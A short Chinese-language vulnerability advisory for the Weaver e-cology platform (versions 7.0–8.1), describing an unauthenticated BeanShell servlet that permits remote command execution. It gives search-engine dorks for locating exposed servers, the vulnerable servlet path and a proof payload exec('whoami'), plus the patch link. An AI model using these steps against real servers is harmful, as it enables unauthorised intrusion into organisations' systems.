泛微協同管理應用平台(e-cology)是一套兼具企業信息門戶、知識文檔管理、工作流程管理、人力資源管理、客戶關系管理、項目管理、財務管理、資產管理、供應鏈管理、數據中心功能的企業大型協同管理平台。
漏洞源於泛微e-cology系統的JAVA Beanshell接口可被未授權訪問,攻擊者調用該Beanshell接口,可構造特定的HTTP請求繞過泛微本身的安全限制從而遠程命令執行。
漏洞影響版本:
e-cology 7.0
e-cology 8.0
e-cology 8.1
漏洞驗證:
第1步:搜索e-cology系統
可通過Google或FOFA進行搜索,Google搜索語法:inurl:"/login/Login.jsp?logintype=1"
FOFA搜索語法:header="ecology_JSessionId"
第2步:訪問Beanshell接口
URL路徑為:/weaver/bsh.servlet.BshServlet/
第3步:執行Payload
在輸入框中輸入想要執行的Java代碼,如:exec("whoami");
參考鏈接:
http://www.cnnvd.org.cn/web/bulletin/bulletinById.tag?mkid=160
https://mp.weixin.qq.com/s/vGgFSof6FMRGNPyTzuH2gQ
https://www.weaver.com.cn/cs/securityDownload.asp